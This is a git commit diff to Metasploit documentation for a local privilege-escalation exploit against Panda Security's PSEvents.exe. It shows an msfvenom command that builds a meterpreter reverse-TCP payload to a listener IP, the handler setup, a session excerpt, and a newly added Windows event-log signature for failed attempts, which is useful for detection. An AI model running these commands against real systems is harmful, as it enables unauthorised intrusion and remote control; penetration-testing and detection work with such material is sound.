updated docs w/ error codes on failed attempts

2016-09-27 20:26:04 -04:00 · 2016-09-27 20:26:04 -04:00 · 7a108e2102
parent 35a2b3e59d
commit 7a108e2102
1 changed files with 24 additions and 0 deletions
--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@ -38,6 +38,7 @@
  
    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
    
+    msf > use exploit/multi/handler 
    msf exploit(handler) > set payload windows/meterpreter_reverse_tcp 
    payload => windows/meterpreter_reverse_tcp
    msf exploit(handler) > set lhost 192.168.2.117
@ -115,3 +116,26 @@
    Logged On Users : 2
    Meterpreter     : x86/win32
    meterpreter > background
+
+## Failed Exploitation Attempts
+
+If the dll doesn't work, PSEvents.exe will fail to run.  While silent to the user, an error will occur in the Application Windows Logs.
+
+ * Event ID: 1000
+ * Task Category (100)
+ * Log Name: Application
+ * Source: Application Error
+ * Details:
+```
+Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
+Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
+Exception code: 0xc0000374
+Fault offset: 0x000d0cf2
+Faulting process id: 0xdd0
+Faulting application start time: 0x01d218a30fbf1ac5
+Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
+Faulting package full name: 
+Faulting package-relative application ID:
+```